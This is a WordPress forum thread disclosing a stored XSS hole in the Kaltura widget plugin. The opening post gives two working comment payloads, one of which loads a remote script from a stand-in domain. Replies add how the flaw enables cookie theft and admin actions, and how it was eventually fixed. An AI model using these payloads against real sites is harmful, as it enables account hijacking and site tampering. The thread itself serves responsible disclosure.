kaltura-widget xss security error

  • I was playing with my friend wordpress site looking for security vulnerabilities (little hobby of mine). And I found that I can run any javascript code on his site by submitting a comment.

    showing an alert:
    [kaltura-widget wid='"); alert("ok"); $("xxx' size="comments" /]

    running code from other server:
    [kaltura-widget wid='"); jQuery.getScript("https://somedomain.com/xss.js"); $("xxx' size="comments" /]

    I guess that it is a bug that should be fixed.

Viewing 8 replies - 1 through 8 (of 8 total)

  • Check out Submitting_Bugs for some guidance on how to get this in front of developers.

    Thanks!

    Thread Starter kdzwinel

    (@kdzwinel)

    Thanks for reply. I don’t really have time to read 10 pages of how to submit a bug ?? Fortunately, I’ve found link to trac and posted new ticket. Hope this helps.

    You should try to contact the plugin author instead.

    I’ve tagged this topic so that it’s more likely to get seen by other users of the plugin.

    Thread Starter kdzwinel

    (@kdzwinel)

    Thanks for reply. I’m sorry for all this mess, but I can’t figure out who is responsible for fixing this.

    On kaltura site I’ve found ‘contact us’ and send them a message, but kaltura looks like a big portal and wordpress plugin is only one of 1000 things they are baking.

    This who use this plugin must be warned because it is a serious security hole. The injected javascript can be hidden in innocent-looking post and do nasty things as account hijacking (via cookie stealing), removing articles/posts (via calling delete actions when triggered by logged admin), posting spam as registered user/admin, screwing site look (by manipulating DOM) etc. Comment moderation is no help, you should disable this plugin.

    It’s Kaltura responsibility, since they wrote the plugin, to promote their service.

    Since it hasn’t been updated in over a year, I don’t think it’s high on their priority list.

    Hi,

    Definitely our responsibility – it’s already in the works. We are updating the plugin on this page.

    Any update on this? I looked at the plugin page linked above but it doesn’t look like an update has been issued.

    I’d like to use the kaltura service but not if there is still the security issues.

    Anyone currently using without issues?

    This issue was fixed in the dev version.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘kaltura-widget xss security error’ is closed to new replies.